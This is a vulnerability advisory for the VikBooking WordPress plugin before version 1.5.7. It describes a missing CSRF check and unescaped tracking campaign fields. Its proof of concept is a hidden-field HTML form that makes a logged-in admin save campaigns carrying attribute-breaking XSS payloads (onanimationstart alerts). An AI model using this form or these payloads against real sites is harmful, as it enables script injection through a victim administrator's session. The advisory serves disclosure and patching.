WordPress Plugin Vulnerabilities

VikBooking Hotel Booking Engine & PMS < 1.5.7 - Stored Cross-Site Scripting via CSRF

Description

The plugin does not have CSRF check in place when adding a tracking campaign, and does not escape the campaign fields when outputting them In attributes. As a result, attackers could make a logged in admin add tracking campaign with XSS payloads in them via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?option=com_vikbooking" method="POST">
      <input type="hidden" name="trkenabled" value="1" />
      <input type="hidden" name="trkcookierfrdur" value="3" />
      <input type="hidden" name="trkcampname[]" value='Test"style=animation-name:rotation onanimationstart=alert(/XSS-Name/)//' />
      <input type="hidden" name="trkcampkey[]" value='"style="animation-name:rotation" onanimationstart="alert(/XSS-Key/)//' />
      <input type="hidden" name="trkcampval[]" value='"style=animation-name:rotation onanimationstart=alert(/XSS-Key-Value/)//' />
      <input type="hidden" name="option" value="com_vikbooking" />
      <input type="hidden" name="task" value="savetrkconfigstay" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

XSS will be triggered in the Statistics Tracking Settings: https://example.com/wp-admin/admin.php?option=com_vikbooking&task=trkconfig

Affects Plugins

Fixed in 1.5.7

References

Classification

Miscellaneous

Original Researcher
Gabriel3476
Submitter
Gabriel3476
Verified
Yes

Timeline

Publicly Published
2022-04-21 (about 2 years ago)
Added
2022-04-21 (about 2 years ago)
Last Updated
2022-04-22 (about 2 years ago)

Other